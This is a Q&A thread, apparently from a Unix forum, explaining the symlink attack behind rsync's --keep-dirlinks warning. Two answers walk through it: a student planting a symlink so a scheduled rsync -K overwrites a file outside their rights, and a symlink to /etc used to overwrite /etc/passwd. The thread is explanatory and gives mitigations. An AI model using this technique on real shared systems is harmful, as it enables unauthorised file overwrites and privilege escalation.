# `rsync -K`-based exploit

Tags: linux, file-system, unix

In the description of the `-K` (`--keep-dirlinks`) flag, the `rsync` man page gives this warning (my emphasis):

> One note of caution:  if you use --keep-dirlinks, you must trust all the symlinks in the copy!  **If it is possible for an untrusted user to create their own symlink to any directory, the user could then (on a subsequent copy) replace the symlink with a real directory and affect the content of whatever directory the symlink references.**  For backup copies, you are better off using something like a bind mount instead of a symlink to modify your receiving hierarchy.

I've read the highlighted sentence several times, and I still cannot picture the exploit it refers to.

Could someone give a fleshed out example of the exploit?  (Please include an explaination of how a "bind mount" avoids the problem.)

---

FWIW, this is my understanding of what the `-K` option does.

For example, if the initial state is this:

```
sender:/path/to/sourcedir
└── foo/
    └── file

receiver:/path/to/targetdir
├── bar/
│   └── stuff
└── foo@ -> bar/
```

Then, after `rsync sender:/path/to/sourcedir/ receiver:/path/to/targetdir`, the receiver will look like this:

```
receiver:/path/to/targetdir
├── bar/
│   └── stuff
└── foo/
    └── file
```

(Note that `foo` is no longer a symlink.)

After `rsync -K sender:/path/to/sourcedir/ receiver:/path/to/targetdir`, on the other hand, it will look like this:

```
receiver:/path/to/targetdir
├── bar/
│   ├── file
│   └── stuff
└── foo@ -> bar/
```

Answer (score 4):

You are correct on the use of the `-K` option.  But the exploit is about having different users performing the link creation and running `rsync`.  Let's first see some `rsync -K` in action.  Make some test dirs:

```
[me] $ mkdir a b c b/from b/from/mydir c/to
[me] $ touch a/bar
[me] $ touch b/from/mydir/foo
```

And run the plain `rsync`

```
[me] $ rsync -avK b/from/ c/to
sending incremental file list
./
mydir/
mydir/foo

sent 135 bytes  received 39 bytes  348.00 bytes/sec
total size is 0  speedup is 0.00
[me] $ find c/to/
c/to/
c/to/mydir
c/to/mydir/foo
```

And let's clean `c` before a new test:

```
[me] $ rm -rf c/to
[me] $ mkdir c/to
```

Now, imagine that I give some **other user** the rights to write into `c/to` and `b/from`.  To make things simple let's say that the following `chgrp` will allow a bunch of people to write in there:

```
[me] $ chgrp -R students c/to b/from
```

And a clever student performs this:

```
[student] $ ln -s ../../a c/to/student_dir
[student] $ mkdir b/from/student_dir
[student] $ echo 1337 > b/from/student_dir/bar
```

The next morning I run `rsync` and:

```
[me] $ rsync -avK b/from/ c/to/
sending incremental file list
./
student_dir/
student_dir/bar
```

**Ouch!** My file inside `a` that I never gave permission to anyone to modify has changed:

```
[me] $ cat a/bar
1337
```

And, since `rsync` is commonly used for repetitive tasks such as cron jobs there is a good chance that this would even go unnoticed.

In simple words the exploit can be argued to be that: *a user that has access to the sender (from) and receiver (to) sides of a recurrent `rsync` job acquires the privileges of the user running the rsync job.*

Don't run `rsync -K` as root!

Answer (score 4):

Here's a possible attack. Start with this on sender:

```
sender:/path/to/sourcedir
└── foo@ -> /etc/
```

Run the rsync once and get this:

```
receiver:/path/to/targetdir
└── foo@ -> /etc/
```

Now change sender to have this:

```
sender:/path/to/sourcedir
└── foo/
    └── passwd
```

Now when the rsync runs again, /etc/passwd will get overwritten on receiver.

Bind mounts prevent this attack because rsync will always write through them but will never create them.

Comment: Wow that was a less than 10 seconds difference in answers :) .  Yeah, that's pretty much it (+1).  Can be very dangerous to run as a user that can overwrite /etc/passwd